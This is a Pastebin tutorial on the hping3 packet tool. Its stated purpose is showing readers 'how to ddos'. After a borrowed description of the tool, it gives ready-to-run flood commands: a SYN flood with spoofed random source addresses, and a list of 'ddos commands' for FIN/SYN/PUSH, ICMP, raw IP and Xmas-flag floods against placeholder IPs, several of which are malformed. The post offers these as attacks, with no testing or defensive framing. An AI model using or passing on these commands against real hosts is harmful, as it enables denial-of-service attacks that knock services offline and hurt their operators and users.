Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hello people!
- I decided to do a simple tutorial on how to use Hping3 on Linux!
- You can do a lot with this tool but today im just going to show you how to ddos.
- What is hping3?
- hping3 is a network tool able to send custom ICMP/UDP/TCP packets and
- to display target replies like ping does with ICMP replies. It handles
- fragmentation and arbitrary packet body and size, and can be used to
- transfer files under supported protocols. Using hping3, you can test
- firewall rules, perform (spoofed) port scanning, test network
- performance using different protocols, do path MTU discovery, perform
- traceroute-like actions under different protocols, fingerprint remote
- operating systems, audit TCP/IP stacks, etc. hping3 is scriptable
- using the Tcl language.
- Source: compuhowto.com
- This tool is not hard to use, so there should not really be any problems with it.
- 1.First open you're console and type "hping3 --help" without the " to see all the commands
- Now you can choose 5 options. tcp, rawip, icmp, udp or scan
- tcp is default so lets take that one. If you choose tcp or udp you can choose what kind of attack you want.
- -F --fin -S --syn -R --rst -P --push -A --ack -U --urg -X --xmas
- -Y --ymas
- We can also spoof our source address without needing a proxy or such.
- 2. Example if we want a syn flood attack we do
- "hping3 -S 23.243.534 --flood --rand-source -p 80 -d 100
- I just inserted some random numbers for the ip.
- 3. You can do a lot of stuff with tool so just play around with it now im going to post some ddos commands.
- Quote:
- hping3 -F -S -P 124.245.2.563 --flood -p 80 -d 9999999
- hping3 --icmp 1312.324.5 -p 80 --flood -d 1000 -q
- hping3 --rawip 123.123.123 --rand-source --flood -p 80 --id n4s4
- hping3 -X 123.123.123 --flood -p 23 --sign N4S4
- Hope you enjoyed my tutorial on how to use hping3 on Linux.
- I think most linux OS have hping3 already installed.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement